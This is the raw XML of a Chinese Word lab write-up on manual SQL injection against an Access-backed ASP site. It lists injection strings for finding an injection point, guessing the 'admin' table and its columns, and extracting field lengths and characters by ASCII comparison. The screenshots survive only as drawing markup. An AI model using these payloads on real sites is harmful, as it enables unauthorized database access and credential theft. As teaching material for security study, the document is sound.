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SQL注入原理－手工注入　access数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>实验原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>所谓sql注入。就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的sql命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>第一步：检测网站是否存在注入点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>　　做法：在以[.asp?id=32（数字任意）]结尾的链接依次添加语句[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>‘]、[and 1=1]、[and 1=2]，来判断网站是否存在注入点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2359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271770" cy="31064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default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="309689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第二步：猜解表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>　　做法：添加语句[and exists(select * from admin)],根据页面结果来猜解表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="31235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  <w:r>
        <w:t>第三步：猜解admin表中的列名admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 　做法：添加语句and exists(select admin from admin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="3042920"/>
            <wp:effectExtent l="0" t="0" r="1143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5266055" cy="29235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t>第四步：猜解字段长度，猜解字段中字符的ASCII码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>　做法：添加语句　and (select top 1 len(admin) from admin)&gt;1,来猜解字段长度，添加语句 and (select top 1 asc(mid(admin,1,1)) from admin)&gt;97,来猜解字段中字符的ASCII码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="302831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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="296608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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="296926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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="3145790"/>
            <wp:effectExtent l="0" t="0" r="1079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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3058795"/>
            <wp:effectExtent l="0" t="0" r="952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56FDE"/>
    <w:rsid w:val="13FB5DA4"/>
    <w:rsid w:val="377B4EC6"/>
    <w:rsid w:val="3F7FF73F"/>
    <w:rsid w:val="3FCAC29A"/>
    <w:rsid w:val="4E772ED3"/>
    <w:rsid w:val="57FF3804"/>
    <w:rsid w:val="59856FDE"/>
    <w:rsid w:val="5BDA9C3A"/>
    <w:rsid w:val="6D2EE013"/>
    <w:rsid w:val="6FBB79AC"/>
    <w:rsid w:val="7DAFB91A"/>
    <w:rsid w:val="7FFE0E4F"/>
    <w:rsid w:val="BBEFEDDA"/>
    <w:rsid w:val="BFFF0829"/>
    <w:rsid w:val="EBEF1AB6"/>
    <w:rsid w:val="FB9F0FDD"/>
    <w:rsid w:val="FF9E60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2018-11-09T14:40:00Z</dcterms:created>
  <dc:creator>zhaopanpan</dc:creator>
  <cp:lastModifiedBy>zhaopanpan</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-09T15:14:11Z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